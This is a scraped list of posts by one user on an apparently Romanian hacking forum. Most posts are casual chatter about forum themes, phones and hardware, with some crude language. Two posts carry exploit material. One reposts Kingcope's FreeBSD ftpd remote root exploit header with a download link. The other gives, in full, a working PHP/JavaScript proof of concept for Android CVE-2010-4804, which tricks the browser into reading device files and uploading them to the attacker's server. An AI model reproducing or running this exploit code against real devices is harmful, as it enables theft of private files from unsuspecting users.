LLegoLLaS
-
Posts
2060 -
Joined
-
Last visited
-
Days Won
11
Posts posted by LLegoLLaS
-
-
sa-mi moara ce-am pe casa daca am inteles ce ai vrut sa zici
-
E ok, au mai ramas join date (Mar 2008) si Rep Power(5).
ps; si pe tema RST Beta,la Infractions e fontu negru la coloanele Expires,Points,date .
-
/* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit
*
* KINGCOPE CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of KINGCOPE Security.
*
* (C) COPYRIGHT KINGCOPE Security, 2011
* All Rights Reserved
*
*****************************************************************************
* bug found by Kingcope
* thanks to noone except alex whose damn down
*
* tested against: FreeBSD-8.2,8.1,7.2,7.1 i386;
* FreeBSD-6.3 i386
* FreeBSD-5.5,5.2 i386
* FreeBSD-8.2 amd64
* FreeBSD-7.3, 7.0 amd64
* FreeBSD-6.4, 6.2 amd64
*
*/
I m better than TESO 7350 see attached.
I aint mad at cha
and dont forget that the scene is fucked.
and that the public scene is fucked too, kind of.
youse a down ass bitch and I aint mad at cha.
thanks lsd you are the only one NORMAL.
hear the track before you see the code:
http://www.youtube.com/watch?v=krxu9_dRUwQ
BTW my box (isowarez.de) got hacked so expect me in a zine :>
/Signed "the awesome" KingcopeCode:
http://www.exploit-db.com/sploits/7350roaringbeastv3.tar -
<?php
/*
* Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities
* Bugtraq ID: 48256
* CVE: CVE-2010-4804
* Affected: Android < 2.3.4
* Author: Thomas Cannon
* Discovered: 18-Nov-2010
* Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/
*
* Filename: poc.php
* Instructions: Specify files you want to upload in filenames array. Host this php file
* on a server and visit it using the Android Browser. Some builds of Android
* may require adjustments to the script, for example when a German build was
* tested it downloaded the payload as .htm instead of .html, even though .html
* was specified.
*
* Tested on: HTC Desire (UK Version) with Android 2.2
*/
// List of the files on the device that we want to upload to our server
$filenames = array("/proc/version","/sdcard/img.jpg");
// Determine the full URL of this script
$protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http";
$scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"];
// Stage 0: Display introduction text and a link to start the PoC.
function stage0($scripturl) {
echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>";
}
// Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect
// to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the
// context of the local device - this is the vulnerability.
function stage1($scripturl) {
echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">";
}
// Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability.
// The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3).
function stage2($scripturl,$filenames) {
header("Cache-Control: public");
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=poc.html");
header("Content-Type: text/html");
header("Content-Transfer-Encoding: binary");
?>
<html>
<body>
<script language='javascript'>
var filenames = Array('<?php echo implode("','",$filenames); ?>');
var filecontents = new Array();
function processBinary(xmlhttp) {
data = xmlhttp.responseText; r = ''; size = data.length;
for(var i = 0; i < size; i++) r += String.fromCharCode(data.charCodeAt(i) & 0xff);
return r;
}
function getFiles(filenames) {
for (var filename in filenames) {
filename = filenames[filename];
xhr = new XMLHttpRequest();
xhr.open('GET', filename, false);
xhr.overrideMimeType('text/plain; charset=x-user-defined');
xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } }
xhr.send();
}
}
function addField(form, name, value) {
var fe = document.createElement('input');
fe.setAttribute('type', 'hidden');
fe.setAttribute('name', name);
fe.setAttribute('value', value);
form.appendChild(fe);
}
function uploadFiles(filecontents) {
var form = document.createElement('form');
form.setAttribute('method', 'POST');
form.setAttribute('enctype', 'multipart/form-data');
form.setAttribute('action', '<?=$scripturl?>?stage=3');
var i = 0;
for (var filename in filecontents) {
addField(form, 'filename'+i, btoa(filename));
addField(form, 'data'+i, filecontents[filename]);
i += 1;
}
document.body.appendChild(form);
form.submit();
}
getFiles(filenames);
uploadFiles(filecontents);
</script>
</body>
</html>
<?php
}
// Stage 3: Read the file names and contents sent by the payload and write to a file on the server.
function stage3() {
$fp = fopen("files.txt", "w") or die("Couldn't open file for writing!");
fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!");
fclose($fp);
echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!";
}
// Select the stage to run depending on the parameter passed in the URL
switch($_GET["stage"]) {
case "1":
stage1($scripturl);
break;
case "2":
stage2($scripturl,$filenames);
break;
case "3":
stage3();
break;
default:
stage0($scripturl);
break;
}
?> -
Probabil nu mei merg, am incrcat cu toate
-
Are cineva vreun cupon de reducere sau orice pt unu din magazinele astea?(reducere peste 10% sau peste 50 ron) Ne intelegem pe privat/ym/skype/porumbel mesager
-
Apropo de asta:
am un id (presupunem X@ yahoo.com)care imi apare offline chiar daca persoana respectiva e online.Am incercat sa sterg din lista cu tot cu adress book /orice ;dupa ce fac asta imi apare online pana la primul logout, dupa asta iar offline;de la ce casa ma-sii e? (reinstall yahu checked,doesn't work)
-
Bine ai venit!Succes!
-
Eu am vreo 4 discuri rewritable noname de vreo 2 ani.Rescrise cu imagini windows de n ori si n-au nici pe drecu
-
numa io am adaugat 40
unde sunt mai putine (Gen Help Center : centrul porno) dai si Vote down la varianta buna
-
nu is aceleasi plm nuj cum le afiseaza.Gasesti altele ca is bune.
cine pula mea a bagat Wife = shemale?
sau curva'Sent from mobile: Imi plac baietii'
-
''zi la {name} ca-i smecher'' dati vote up repede (e la Give Credit)
-
cold reset (il stimgi) si apesi tasta * , tasta 3 si tasta de raspuns (verde).In timp ce te chinui sa le tii apasate iti mai tre un deget sa il pornesti
-
platforma: DCT4+
incearca asta: http: //unlock. nokiafree.org/download.php
sau http ://unlock .nokiafree.org/1209
nu am testat nimic
-
x-plore ca file manager si alte aplcai tii de la lonelycatgames .com
-
ringtone : Zippyshare.com - crank_ring.mp3
sms tone : Zippyshare.com - Scary.mp3
astea le folosesc de vreun an si ceva
-
Vezi topicul lui 1337 despre Social Engineering la firme mari.In cazu tau e totu legal
-
nu e o scuza ca e copy/paste.Cand copiezi ceva aici te supui regulilor de aici nu de pe cacatforums
-
eu nu
cunostinte?
31,12 si 94 is numerele tale norocoase?
-
nForce nu e chipsetul placii de baza? + ripoff= placa de sunet integrata
-
Si mie mi-a resetat tema si tot dar imi merg 720p-urile (html 5 enabled)
-
da sa monteze gps nu vor futu-i in inima?
-
Cunostinte?
-
It might work but it isn't recommended on such pc (64 mb video ram)
cat tine acumulatori incarcati 2 ore?
in Cosul de gunoi
Posted
depinde de care is: NiCD,NiMH, depinde si de capacitate (cati mAh) si bineinteles la ce ii folosesti,depinde de aseamenea de gradul de uzura,de calitate (una e serioux si alta e duracell sau energizer)